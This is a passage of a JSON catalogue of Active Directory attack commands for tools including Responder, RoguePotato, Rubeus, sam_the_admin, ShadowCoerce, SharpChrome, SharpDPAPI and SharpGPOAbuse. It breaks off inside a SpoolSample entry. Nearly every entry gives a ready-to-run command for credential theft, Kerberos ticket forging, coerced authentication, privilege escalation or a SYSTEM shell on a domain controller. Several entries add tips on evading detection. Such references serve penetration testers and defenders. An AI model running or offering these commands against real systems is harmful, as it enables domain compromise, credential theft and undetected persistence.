   4023     "id": "wadcoms:Responder-Poisoning",
   4024     "toolId": "wadcoms:Responder",
   4025     "toolName": "Responder",
   4026     "name": "Responder-Poisoning",
   4027     "source": "DAEMON",
   4028     "platform": [
   4029       "Linux",
   4030       "ActiveDirectory",
   4031       "Windows"
   4032     ],
   4033     "capability": [
   4034       "Credential Access",
   4035       "Collection",
   4036       "Execution"
   4037     ],
   4038     "nativeCategory": [
   4039       "Credential Access",
   4040       "Collection",
   4041       "Exploitation"
   4042     ],
   4043     "command": "# Actively poison LLMNR/NBT-NS/mDNS and serve rogue WPAD to capture NetNTLM hashes\nsudo responder -I eth0 -wv",
   4044     "description": "Responder is an LLMNR, NBT-NS, and mDNS poisoner. Run without the analyze flag, it actively answers name-resolution broadcasts (LLMNR, NBT-NS, mDNS) with the attacker's IP, causing victims to connect to Responder's rogue SMB/HTTP/etc. servers and disclose NTLMv1/NTLMv2 challenge-response hashes, which are captured to logs for offline cracking. The -w flag starts the rogue WPAD proxy to poison web-proxy autodiscovery, and -d answers DHCP requests. Captured hashes can be cracked with hashcat or, instead of cracking, forwarded live to ntlmrelayx.py (disable Responder's SMB and HTTP servers in Responder.conf when relaying). This is a noisy, active on-network attack.\n\nCommand Reference:\n\n\tInterface: eth0\n\n\tCaptured hashes log: hashes.txt",
   4045     "mitre": [
   4046       "T1557.001"
   4047     ],
   4048     "requires": [
   4049       "No_Creds"
   4050     ],
   4051     "services": [
   4052       "NTLM",
   4053       "SMB"
   4054     ],
   4055     "references": [
   4056       "https://github.com/lgandx/Responder",
   4057       "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing",
   4058       "https://attack.mitre.org/techniques/T1557/001/"
   4059     ],
   4060     "added": true
   4061   },
   4062   {
   4063     "id": "wadcoms:RoguePotato-SeImpersonate",
   4064     "toolId": "wadcoms:RoguePotato",
   4065     "toolName": "RoguePotato",
   4066     "name": "RoguePotato-SeImpersonate",
   4067     "source": "DAEMON",
   4068     "platform": [
   4069       "Windows",
   4070       "Linux",
   4071       "ActiveDirectory"
   4072     ],
   4073     "capability": [
   4074       "Privilege Escalation",
   4075       "Execution"
   4076     ],
   4077     "nativeCategory": [
   4078       "PrivEsc",
   4079       "Exploitation"
   4080     ],
   4081     "command": "# On the attacker (Linux): redirect inbound 135 back to the RoguePotato listener on the target\nsocat tcp-listen:135,reuseaddr,fork tcp:10.10.10.1:9999\n\n# On the target (Windows): -r remote OXID resolver, -e command, -l listener port\nRoguePotato.exe -r 10.10.10.2 -e \"C:\\Windows\\System32\\cmd.exe /c whoami\" -l 9999",
   4082     "description": "RoguePotato bypasses the JuicyPotato mitigation by redirecting the DCOM/RPC OXID resolution to a remote resolver the attacker controls on port 135, which forces a SYSTEM authentication that RoguePotato impersonates. Because outbound 135 to the internet is usually blocked and the target queries the resolver on 135, run a socat redirector on the attacker host that forwards 135 to the RoguePotato listener port (-l) on the target. Works on Windows 10 / Server 2016-2019. Requires SeImpersonatePrivilege.\n\nCommand Reference:\n\n\tAttacker/Listener IP: 10.10.10.2\n\n\tTarget IP: 10.10.10.1\n\n\tOXID resolver / listen port: 9999",
   4083     "mitre": [],
   4084     "requires": [
   4085       "Shell"
   4086     ],
   4087     "services": [
   4088       "DCOM",
   4089       "RPC"
   4090     ],
   4091     "references": [
   4092       "https://github.com/antonioCoco/RoguePotato",
   4093       "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"
   4094     ],
   4095     "added": true
   4096   },
   4097   {
   4098     "id": "wadcoms:Rubeus-Describe",
   4099     "toolId": "wadcoms:Rubeus",
   4100     "toolName": "Rubeus",
   4101     "name": "Rubeus-Describe",
   4102     "source": "DAEMON",
   4103     "platform": [
   4104       "Windows",
   4105       "ActiveDirectory"
   4106     ],
   4107     "capability": [
   4108       "Discovery"
   4109     ],
   4110     "nativeCategory": [
   4111       "Discovery"
   4112     ],
   4113     "command": "# Parse and describe a ticket offline\nRubeus.exe describe /ticket:ticket.kirbi",
   4114     "description": "Rubeus describe parses a ticket (TGT or service ticket) and prints its metadata: user, realm, service name, encryption type, flags, start/end/renew-till times and the session key. It does not touch the network, making it a safe way to inspect captured or forged tickets before use. Supplying a service/krbtgt key allows it to also decrypt and display the embedded PAC.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi",
   4115     "mitre": [],
   4116     "requires": [
   4117       "TGT"
   4118     ],
   4119     "services": [
   4120       "Kerberos"
   4121     ],
   4122     "references": [
   4123       "https://github.com/GhostPack/Rubeus",
   4124       "https://www.thehacker.recipes/ad/movement/kerberos/ptt"
   4125     ],
   4126     "added": true
   4127   },
   4128   {
   4129     "id": "wadcoms:Rubeus-DiamondTicket",
   4130     "toolId": "wadcoms:Rubeus",
   4131     "toolName": "Rubeus",
   4132     "name": "Rubeus-DiamondTicket",
   4133     "source": "DAEMON",
   4134     "platform": [
   4135       "Windows",
   4136       "ActiveDirectory"
   4137     ],
   4138     "capability": [
   4139       "Persistence",
   4140       "Defense Evasion",
   4141       "Execution"
   4142     ],
   4143     "nativeCategory": [
   4144       "Persistence",
   4145       "Defense Evasion",
   4146       "Exploitation"
   4147     ],
   4148     "command": "# Forge a diamond TGT: request a real TGT as 'john', then re-sign the PAC as administrator (RID 500).\n# /krbkey is the krbtgt AES256 key.\nRubeus.exe diamond /creduser:john /credpassword:password123 /krbkey:5db474e563f34e4bb62e04eecd4a6f92 /ticketuser:administrator /ticketuserid:500 /groups:512 /nowrap",
   4149     "description": "Rubeus diamond forges a diamond ticket by requesting a real TGT for a valid account, decrypting it with the krbtgt key, modifying the embedded PAC (user, RID, groups, extra SIDs) and re-encrypting it. Unlike a golden ticket it is derived from a legitimate KDC-issued TGT, so its metadata is internally consistent and far harder to distinguish from genuine tickets. Requires valid credentials for the request plus the krbtgt AES/NT key to re-sign the PAC.\n\nCommand Reference:\n\n\tUsername: john\n\n\tPassword: password123\n\n\tAES256 krbtgt key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain: test.local",
   4150     "mitre": [],
   4151     "requires": [
   4152       "AES_Key",
   4153       "Username",
   4154       "Password"
   4155     ],
   4156     "services": [
   4157       "Kerberos"
   4158     ],
   4159     "references": [
   4160       "https://github.com/GhostPack/Rubeus",
   4161       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/diamond-ticket",
   4162       "https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond"
   4163     ],
   4164     "added": true
   4165   },
   4166   {
   4167     "id": "wadcoms:Rubeus-Dump",
   4168     "toolId": "wadcoms:Rubeus",
   4169     "toolName": "Rubeus",
   4170     "name": "Rubeus-Dump",
   4171     "source": "DAEMON",
   4172     "platform": [
   4173       "Windows",
   4174       "ActiveDirectory"
   4175     ],
   4176     "capability": [
   4177       "Credential Access"
   4178     ],
   4179     "nativeCategory": [
   4180       "Credential Access"
   4181     ],
   4182     "command": "# Dump all TGTs from LSA (elevated dumps every session)\nRubeus.exe dump /service:krbtgt /nowrap",
   4183     "description": "Rubeus dump extracts Kerberos tickets from LSA memory. When elevated it dumps tickets for every logon session on the host; unelevated it returns only the current user's tickets. Filters let you target a specific service (e.g. krbtgt for TGTs) or LUID, and /nowrap keeps the base64 on a single line for easy copy-out and reuse via ptt.\n\nCommand Reference:\n\n\tService filter: krbtgt",
   4184     "mitre": [
   4185       "T1558"
   4186     ],
   4187     "requires": [
   4188       "Shell"
   4189     ],
   4190     "services": [
   4191       "Kerberos"
   4192     ],
   4193     "references": [
   4194       "https://github.com/GhostPack/Rubeus",
   4195       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket",
   4196       "https://attack.mitre.org/techniques/T1558/"
   4197     ],
   4198     "added": true
   4199   },
   4200   {
   4201     "id": "wadcoms:Rubeus-GoldenTicket-AES",
   4202     "toolId": "wadcoms:Rubeus",
   4203     "toolName": "Rubeus",
   4204     "name": "Rubeus-GoldenTicket-AES",
   4205     "source": "DAEMON",
   4206     "platform": [
   4207       "Windows",
   4208       "ActiveDirectory"
   4209     ],
   4210     "capability": [
   4211       "Persistence",
   4212       "Execution"
   4213     ],
   4214     "nativeCategory": [
   4215       "Persistence",
   4216       "Exploitation"
   4217     ],
   4218     "command": "# Forge an AES256 golden ticket for the built-in administrator (RID 500)\nRubeus.exe golden /aes256:5db474e563f34e4bb62e04eecd4a6f92 /user:administrator /id:500 /domain:test.local /sid:S-1-5-21-1339291983-1349129144-367733775 /nowrap",
   4219     "description": "Rubeus golden forges a TGT signed with the domain krbtgt key, granting arbitrary identity and group membership across the domain until the krbtgt password is rotated twice. Supplying the krbtgt AES256 key with /aes256 produces an AES-encrypted ticket, avoiding the RC4 golden tickets that modern detections flag. Requires the krbtgt key, the domain SID, and typically privileged access to have obtained the key via DCSync.\n\nCommand Reference:\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tUsername: administrator\n\n\tDomain: test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775",
   4220     "mitre": [
   4221       "T1558.001"
   4222     ],
   4223     "requires": [
   4224       "AES_Key"
   4225     ],
   4226     "services": [
   4227       "Kerberos"
   4228     ],
   4229     "references": [
   4230       "https://github.com/GhostPack/Rubeus",
   4231       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket",
   4232       "https://attack.mitre.org/techniques/T1558/001/"
   4233     ],
   4234     "added": true
   4235   },
   4236   {
   4237     "id": "wadcoms:Rubeus-Harvest",
   4238     "toolId": "wadcoms:Rubeus",
   4239     "toolName": "Rubeus",
   4240     "name": "Rubeus-Harvest",
   4241     "source": "DAEMON",
   4242     "platform": [
   4243       "Windows",
   4244       "ActiveDirectory"
   4245     ],
   4246     "capability": [
   4247       "Credential Access",
   4248       "Collection",
   4249       "Persistence"
   4250     ],
   4251     "nativeCategory": [
   4252       "Credential Access",
   4253       "Collection",
   4254       "Persistence"
   4255     ],
   4256     "command": "# Harvest TGTs every 30s and auto-renew them up to their renew-till limit\nRubeus.exe harvest /interval:30 /nowrap",
   4257     "description": "Rubeus harvest monitors for new TGTs and automatically renews them before they expire, keeping a working cache of live tickets that can be extracted and reused. It combines the monitor behavior with auto-renewal, which is valuable during long engagements to avoid losing captured tickets to the default 10-hour lifetime. Elevation is required to harvest tickets for all logon sessions.\n\nCommand Reference:\n\n\tMonitor interval: 30 seconds",
   4258     "mitre": [
   4259       "T1558"
   4260     ],
   4261     "requires": [
   4262       "Shell"
   4263     ],
   4264     "services": [
   4265       "Kerberos"
   4266     ],
   4267     "references": [
   4268       "https://github.com/GhostPack/Rubeus",
   4269       "https://www.thehacker.recipes/ad/movement/kerberos/ptt",
   4270       "https://attack.mitre.org/techniques/T1558/"
   4271     ],
   4272     "added": true
   4273   },
   4274   {
   4275     "id": "wadcoms:Rubeus-Monitor",
   4276     "toolId": "wadcoms:Rubeus",
   4277     "toolName": "Rubeus",
   4278     "name": "Rubeus-Monitor",
   4279     "source": "DAEMON",
   4280     "platform": [
   4281       "Windows",
   4282       "ActiveDirectory"
   4283     ],
   4284     "capability": [
   4285       "Credential Access",
   4286       "Collection"
   4287     ],
   4288     "nativeCategory": [
   4289       "Credential Access",
   4290       "Collection"
   4291     ],
   4292     "command": "# Poll every 5 seconds for newly captured TGTs, filtered to one user\nRubeus.exe monitor /interval:5 /filteruser:john /nowrap",
   4293     "description": "Rubeus monitor continuously watches for new Kerberos TGTs as users authenticate to the host, printing any captured tickets on a fixed interval. It is most useful on servers where privileged accounts or delegation targets log on, letting an operator harvest fresh TGTs for pass-the-ticket. Requires an elevated context to see tickets for other logon sessions.\n\nCommand Reference:\n\n\tUsername: john",
   4294     "mitre": [
   4295       "T1558"
   4296     ],
   4297     "requires": [
   4298       "Shell"
   4299     ],
   4300     "services": [
   4301       "Kerberos"
   4302     ],
   4303     "references": [
   4304       "https://github.com/GhostPack/Rubeus",
   4305       "https://www.thehacker.recipes/ad/movement/kerberos/ptt",
   4306       "https://attack.mitre.org/techniques/T1558/"
   4307     ],
   4308     "added": true
   4309   },
   4310   {
   4311     "id": "wadcoms:Rubeus-OverPassTheHash",
   4312     "toolId": "wadcoms:Rubeus",
   4313     "toolName": "Rubeus",
   4314     "name": "Rubeus-OverPassTheHash",
   4315     "source": "DAEMON",
   4316     "platform": [
   4317       "Windows",
   4318       "ActiveDirectory"
   4319     ],
   4320     "capability": [
   4321       "Lateral Movement",
   4322       "Credential Access"
   4323     ],
   4324     "nativeCategory": [
   4325       "Lateral Movement",
   4326       "Credential Access"
   4327     ],
   4328     "command": "# Over-pass-the-hash: turn an AES256 key into a live TGT and inject it\nRubeus.exe asktgt /user:john /aes256:5db474e563f34e4bb62e04eecd4a6f92 /domain:test.local /dc:dc.test.local /ptt /nowrap",
   4329     "description": "Over-pass-the-hash (pass-the-key) uses a captured AES or NT key to request a legitimate TGT for that user directly from the KDC, converting a stolen key into full Kerberos access without ever knowing the plaintext password. Using the AES256 key with /aes256 avoids the RC4 (etype 23) downgrade that mature environments alert on, making it more OPSEC-safe than /rc4. The /ptt flag injects the resulting TGT for immediate lateral movement.\n\nCommand Reference:\n\n\tUsername: john\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain: test.local\n\n\tDomain Controller host: dc.test.local",
   4330     "mitre": [],
   4331     "requires": [
   4332       "AES_Key",
   4333       "Username"
   4334     ],
   4335     "services": [
   4336       "Kerberos"
   4337     ],
   4338     "references": [
   4339       "https://github.com/GhostPack/Rubeus",
   4340       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key",
   4341       "https://www.thehacker.recipes/ad/movement/kerberos/ptt"
   4342     ],
   4343     "added": true
   4344   },
   4345   {
   4346     "id": "wadcoms:Rubeus-Ptt",
   4347     "toolId": "wadcoms:Rubeus",
   4348     "toolName": "Rubeus",
   4349     "name": "Rubeus-Ptt",
   4350     "source": "DAEMON",
   4351     "platform": [
   4352       "Windows",
   4353       "ActiveDirectory"
   4354     ],
   4355     "capability": [
   4356       "Lateral Movement",
   4357       "Defense Evasion"
   4358     ],
   4359     "nativeCategory": [
   4360       "Lateral Movement",
   4361       "Defense Evasion"
   4362     ],
   4363     "command": "# Inject a .kirbi ticket into the current session\nRubeus.exe ptt /ticket:ticket.kirbi\n\n# Or target a specific logon session by LUID (requires elevation)\nRubeus.exe ptt /ticket:ticket.kirbi /luid:0x3e7",
   4364     "description": "Rubeus ptt performs a pass-the-ticket by submitting a base64 or .kirbi ticket into the current logon session (or a target LUID when elevated). Once injected the ticket is used transparently by Windows for Kerberos authentication to remote services such as SMB, LDAP or WinRM. Use it after obtaining a TGT/TGS via tgtdeleg, dump, monitor, kerberoast/s4u, or Impacket ticketConverter output.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi",
   4365     "mitre": [],
   4366     "requires": [
   4367       "TGT"
   4368     ],
   4369     "services": [
   4370       "Kerberos",
   4371       "SMB",
   4372       "LDAP"
   4373     ],
   4374     "references": [
   4375       "https://github.com/GhostPack/Rubeus",
   4376       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket",
   4377       "https://www.thehacker.recipes/ad/movement/kerberos/ptt"
   4378     ],
   4379     "added": true
   4380   },
   4381   {
   4382     "id": "wadcoms:Rubeus-Renew",
   4383     "toolId": "wadcoms:Rubeus",
   4384     "toolName": "Rubeus",
   4385     "name": "Rubeus-Renew",
   4386     "source": "DAEMON",
   4387     "platform": [
   4388       "Windows",
   4389       "ActiveDirectory"
   4390     ],
   4391     "capability": [
   4392       "Persistence",
   4393       "Credential Access"
   4394     ],
   4395     "nativeCategory": [
   4396       "Persistence",
   4397       "Credential Access"
   4398     ],
   4399     "command": "# Renew a TGT from a .kirbi file and inject it, auto-renewing to the renew-till limit\nRubeus.exe renew /ticket:ticket.kirbi /dc:dc.test.local /autorenew /ptt /nowrap",
   4400     "description": "Rubeus renew submits a renewal request for an existing TGT to the KDC, returning a fresh ticket with an extended validity window. It accepts either a base64 blob or a .kirbi file and can auto-renew repeatedly up to the ticket's renew-till limit, which helps maintain access without re-authenticating. Combine with /ptt to inject the renewed ticket into the current session.\n\nCommand Reference:\n\n\tDomain Controller host: dc.test.local",
   4401     "mitre": [],
   4402     "requires": [
   4403       "TGT"
   4404     ],
   4405     "services": [
   4406       "Kerberos"
   4407     ],
   4408     "references": [
   4409       "https://github.com/GhostPack/Rubeus",
   4410       "https://www.thehacker.recipes/ad/movement/kerberos/ptt",
   4411       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket"
   4412     ],
   4413     "added": true
   4414   },
   4415   {
   4416     "id": "wadcoms:Rubeus-TgtDeleg",
   4417     "toolId": "wadcoms:Rubeus",
   4418     "toolName": "Rubeus",
   4419     "name": "Rubeus-TgtDeleg",
   4420     "source": "DAEMON",
   4421     "platform": [
   4422       "Windows",
   4423       "ActiveDirectory"
   4424     ],
   4425     "capability": [
   4426       "Credential Access"
   4427     ],
   4428     "nativeCategory": [
   4429       "Credential Access"
   4430     ],
   4431     "command": "# Extract a usable TGT (.kirbi + session key) for the current user, no elevation needed\nRubeus.exe tgtdeleg /nowrap",
   4432     "description": "Rubeus tgtdeleg abuses the Kerberos GSS-API delegation mechanism to obtain a usable TGT (including its session key) for the current user context without requiring local administrator rights. It requests a service ticket for a target SPN with the delegation flag set, then extracts the forwarded TGT that the KDC embeds, yielding a .kirbi that can be passed to another host. Use it for pass-the-ticket from an unprivileged foothold when you cannot dump LSASS.\n\nCommand Reference:\n\n\tDomain Controller host: dc.test.local",
   4433     "mitre": [],
   4434     "requires": [
   4435       "Shell"
   4436     ],
   4437     "services": [
   4438       "Kerberos"
   4439     ],
   4440     "references": [
   4441       "https://github.com/GhostPack/Rubeus",
   4442       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/unconstrained-delegation",
   4443       "https://www.thehacker.recipes/ad/movement/kerberos/ptt"
   4444     ],
   4445     "added": true
   4446   },
   4447   {
   4448     "id": "wadcoms:sam-the-admin",
   4449     "toolId": "wadcoms:sam",
   4450     "toolName": "sam",
   4451     "name": "sam_the_admin (sAMAccountName Spoofing)",
   4452     "source": "DAEMON",
   4453     "platform": [
   4454       "Linux",
   4455       "ActiveDirectory",
   4456       "Windows"
   4457     ],
   4458     "capability": [
   4459       "Privilege Escalation",
   4460       "Execution",
   4461       "Credential Access"
   4462     ],
   4463     "nativeCategory": [
   4464       "PrivEsc",
   4465       "Exploitation",
   4466       "Credential Access"
   4467     ],
   4468     "command": "# SYSTEM shell on the DC\npython3 sam_the_admin.py \"test.local/john:password123\" -dc-ip 10.10.10.1 -shell\n\n# Dump domain hashes\npython3 sam_the_admin.py \"test.local/john:password123\" -dc-ip 10.10.10.1 -dump",
   4469     "description": "WazeHell's sam_the_admin.py is a self-contained implementation of the CVE-2021-42278 + CVE-2021-42287 chain. It creates a computer account, spoofs its sAMAccountName to impersonate the DC machine account, and automatically impersonates the Administrator to obtain a privileged ticket. Requires MachineAccountQuota > 0 and an unpatched DC. Pass -shell for a semi-interactive SYSTEM shell on the DC or -dump to run secretsdump; the account only needs valid domain credentials (no special privileges).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1",
   4470     "mitre": [],
   4471     "requires": [
   4472       "Username",
   4473       "Password"
   4474     ],
   4475     "services": [
   4476       "Kerberos",
   4477       "SMB",
   4478       "LDAP"
   4479     ],
   4480     "references": [
   4481       "https://github.com/WazeHell/sam-the-admin",
   4482       "https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"
   4483     ],
   4484     "added": true
   4485   },
   4486   {
   4487     "id": "wadcoms:ShadowCoerce",
   4488     "toolId": "wadcoms:ShadowCoerce",
   4489     "toolName": "ShadowCoerce",
   4490     "name": "ShadowCoerce",
   4491     "source": "DAEMON",
   4492     "platform": [
   4493       "Linux",
   4494       "ActiveDirectory",
   4495       "Windows"
   4496     ],
   4497     "capability": [
   4498       "Execution"
   4499     ],
   4500     "nativeCategory": [
   4501       "Exploitation"
   4502     ],
   4503     "command": "python3 shadowcoerce.py -d test.local -u john -p password123 10.10.10.2 10.10.10.1",
   4504     "description": "ShadowCoerce abuses the MS-FSRVP (File Server Remote VSS Protocol) RPC interface to coerce a target host into authenticating to an attacker-controlled listener. MS-FSRVP is exposed when the File Server VSS Agent Service feature is installed, so the vector is more situational than PrinterBug or PetitPotam, but it remained exploitable after some EFSRPC patches. The listener is supplied first and the target second, matching the PetitPotam-style argument order. Provide a valid domain account or NT hash.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123",
   4505     "mitre": [],
   4506     "requires": [
   4507       "Username",
   4508       "Password"
   4509     ],
   4510     "services": [
   4511       "RPC",
   4512       "NTLM"
   4513     ],
   4514     "references": [
   4515       "https://github.com/ShutdownRepo/ShadowCoerce",
   4516       "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp"
   4517     ],
   4518     "added": true
   4519   },
   4520   {
   4521     "id": "wadcoms:SharpChrome-Logins",
   4522     "toolId": "wadcoms:SharpChrome",
   4523     "toolName": "SharpChrome",
   4524     "name": "SharpChrome-Logins",
   4525     "source": "DAEMON",
   4526     "platform": [
   4527       "Windows",
   4528       "ActiveDirectory"
   4529     ],
   4530     "capability": [
   4531       "Credential Access",
   4532       "Collection"
   4533     ],
   4534     "nativeCategory": [
   4535       "Credential Access",
   4536       "Collection"
   4537     ],
   4538     "command": "SharpChrome.exe logins /unprotect",
   4539     "description": "SharpChrome (part of the SharpDPAPI project) extracts Chromium-based browser secrets - saved logins, cookies, and credit cards - by resolving the browser's DPAPI-protected AES state key and decrypting the login database. The logins command with /unprotect uses the current user's DPAPI keys directly to reveal stored passwords in plaintext. Run it in the target user's session (or supply /pvk: with the domain backup key); it also supports /browser:edge and cookies output for session hijacking.\n\nCommand Reference:\n\n\tTarget browser: Chrome (current user profile)",
   4540     "mitre": [
   4541       "T1555.003"
   4542     ],
   4543     "requires": [
   4544       "Shell"
   4545     ],
   4546     "services": [
   4547       "NTLM"
   4548     ],
   4549     "references": [
   4550       "https://github.com/GhostPack/SharpDPAPI",
   4551       "https://book.hacktricks.xyz/windows-hardening/stealing-credentials",
   4552       "https://attack.mitre.org/techniques/T1555/003/"
   4553     ],
   4554     "added": true
   4555   },
   4556   {
   4557     "id": "wadcoms:SharpDPAPI-Masterkeys-Credentials",
   4558     "toolId": "wadcoms:SharpDPAPI",
   4559     "toolName": "SharpDPAPI",
   4560     "name": "SharpDPAPI-Masterkeys-Credentials",
   4561     "source": "DAEMON",
   4562     "platform": [
   4563       "Windows",
   4564       "ActiveDirectory"
   4565     ],
   4566     "capability": [
   4567       "Credential Access"
   4568     ],
   4569     "nativeCategory": [
   4570       "Credential Access"
   4571     ],
   4572     "command": "# Decrypt the user's DPAPI masterkeys\nSharpDPAPI.exe masterkeys /password:password123\n\n# Decrypt Credential Manager blobs with the recovered masterkeys\nSharpDPAPI.exe credentials /mkfile:masterkeys.txt",
   4573     "description": "SharpDPAPI is a C# port of Mimikatz's DPAPI functionality for triaging Windows Data Protection API secrets. The masterkeys command decrypts the current user's DPAPI master keys (with /password: for their plaintext, or /pvk: with the domain backup key), writing a {GUID}:SHA1 lookup file. The credentials command then uses that /mkfile: to decrypt the user's Credential Manager blobs to plaintext. Run it from the user's own context or an elevated shell; it avoids dropping Mimikatz on disk.\n\nCommand Reference:\n\n\tPassword: password123\n\n\tMasterkey file: masterkeys.txt",
   4574     "mitre": [
   4575       "T1555.004"
   4576     ],
   4577     "requires": [
   4578       "Shell",
   4579       "Password"
   4580     ],
   4581     "services": [
   4582       "NTLM"
   4583     ],
   4584     "references": [
   4585       "https://github.com/GhostPack/SharpDPAPI",
   4586       "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords",
   4587       "https://attack.mitre.org/techniques/T1555/004/"
   4588     ],
   4589     "added": true
   4590   },
   4591   {
   4592     "id": "wadcoms:SharpGPOAbuse-AddLocalAdmin",
   4593     "toolId": "wadcoms:SharpGPOAbuse",
   4594     "toolName": "SharpGPOAbuse",
   4595     "name": "SharpGPOAbuse-AddLocalAdmin",
   4596     "source": "DAEMON",
   4597     "platform": [
   4598       "Windows",
   4599       "ActiveDirectory"
   4600     ],
   4601     "capability": [
   4602       "Privilege Escalation",
   4603       "Lateral Movement",
   4604       "Persistence"
   4605     ],
   4606     "nativeCategory": [
   4607       "PrivEsc",
   4608       "Lateral Movement",
   4609       "Persistence"
   4610     ],
   4611     "command": "SharpGPOAbuse.exe --AddLocalAdmin --UserAccount john --GPOName \"Vulnerable GPO\"",
   4612     "description": "SharpGPOAbuse abuses edit rights over a Group Policy Object to push malicious settings to every computer/user in the GPO's scope. --AddLocalAdmin injects a Restricted Groups / GptTmpl.inf entry that adds the specified account to the local Administrators group on all machines the GPO applies to. You must already have write access to the target GPO (found via PowerView's Get-DomainGPO ACLs); changes take effect at the next Group Policy refresh, so consider forcing gpupdate on target hosts.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget GPO: Vulnerable GPO",
   4613     "mitre": [
   4614       "T1484.001"
   4615     ],
   4616     "requires": [
   4617       "Shell"
   4618     ],
   4619     "services": [
   4620       "LDAP"
   4621     ],
   4622     "references": [
   4623       "https://github.com/FSecureLABS/SharpGPOAbuse",
   4624       "https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e",
   4625       "https://attack.mitre.org/techniques/T1484/001/"
   4626     ],
   4627     "added": true
   4628   },
   4629   {
   4630     "id": "wadcoms:SharpGPOAbuse-AddUserRights",
   4631     "toolId": "wadcoms:SharpGPOAbuse",
   4632     "toolName": "SharpGPOAbuse",
   4633     "name": "SharpGPOAbuse-AddUserRights",
   4634     "source": "DAEMON",
   4635     "platform": [
   4636       "Windows",
   4637       "ActiveDirectory"
   4638     ],
   4639     "capability": [
   4640       "Privilege Escalation",
   4641       "Persistence"
   4642     ],
   4643     "nativeCategory": [
   4644       "PrivEsc",
   4645       "Persistence"
   4646     ],
   4647     "command": "SharpGPOAbuse.exe --AddUserRights --UserRights \"SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight\" --UserAccount john --GPOName \"Vulnerable GPO\"",
   4648     "description": "SharpGPOAbuse --AddUserRights assigns Windows privileges / logon rights to an account through an editable GPO, writing them into the GPO's security template. Granting rights such as SeDebugPrivilege, SeTakeOwnershipPrivilege, or SeRemoteInteractiveLogonRight to a controlled user provides a durable escalation and remote-logon foothold across every host in scope. The --UserRights list is comma-separated and case-sensitive and must use the exact NT privilege constant names.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget GPO: Vulnerable GPO",
   4649     "mitre": [
   4650       "T1484.001"
   4651     ],
   4652     "requires": [
   4653       "Shell"
   4654     ],
   4655     "services": [
   4656       "LDAP"
   4657     ],
   4658     "references": [
   4659       "https://github.com/FSecureLABS/SharpGPOAbuse",
   4660       "https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e",
   4661       "https://attack.mitre.org/techniques/T1484/001/"
   4662     ],
   4663     "added": true
   4664   },
   4665   {
   4666     "id": "wadcoms:SharpView-Enumeration",
   4667     "toolId": "wadcoms:SharpView",
   4668     "toolName": "SharpView",
   4669     "name": "SharpView-Enumeration",
   4670     "source": "DAEMON",
   4671     "platform": [
   4672       "Windows",
   4673       "ActiveDirectory"
   4674     ],
   4675     "capability": [
   4676       "Enumeration",
   4677       "Discovery"
   4678     ],
   4679     "nativeCategory": [
   4680       "Enumeration",
   4681       "Discovery"
   4682     ],
   4683     "command": "# Kerberoastable accounts\nSharpView.exe Get-DomainUser -SPN\n# AS-REP roastable accounts\nSharpView.exe Get-DomainUser -PreauthNotRequired\n# Interesting ACLs with resolved GUIDs\nSharpView.exe Find-InterestingDomainAcl -ResolveGUIDs",
   4684     "description": "SharpView is a .NET/C# port of PowerView that exposes the same function names and parameters as a compiled executable, useful when PowerShell is locked down (Constrained Language Mode, AMSI/logging on script hosts) but arbitrary binaries still run. Each PowerView function becomes a positional first argument, and switches keep their PowerView names. It is handy for one-shot enumeration such as pulling kerberoastable accounts or interesting ACLs from a beacon.\n\nCommand Reference:\n\n\tDomain: test.local",
   4685     "mitre": [],
   4686     "requires": [
   4687       "Shell"
   4688     ],
   4689     "services": [
   4690       "LDAP"
   4691     ],
   4692     "references": [
   4693       "https://github.com/tevora-threat/SharpView",
   4694       "https://github.com/PowerShellMafia/PowerSploit",
   4695       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"
   4696     ],
   4697     "added": true
   4698   },
   4699   {
   4700     "id": "wadcoms:SpoolSample-PrinterBug",
   4701     "toolId": "wadcoms:SpoolSample",
   4702     "toolName": "SpoolSample",
   4703     "name": "SpoolSample-PrinterBug",
   4704     "source": "DAEMON",
   4705     "platform": [
   4706       "Windows",
   4707       "ActiveDirectory"
   4708     ],
   4709     "capability": [
   4710       "Execution"
   4711     ],
   4712     "nativeCategory": [
   4713       "Exploitation"
   4714     ],
   4715     "command": "SpoolSample.exe 10.10.10.1 10.10.10.2",
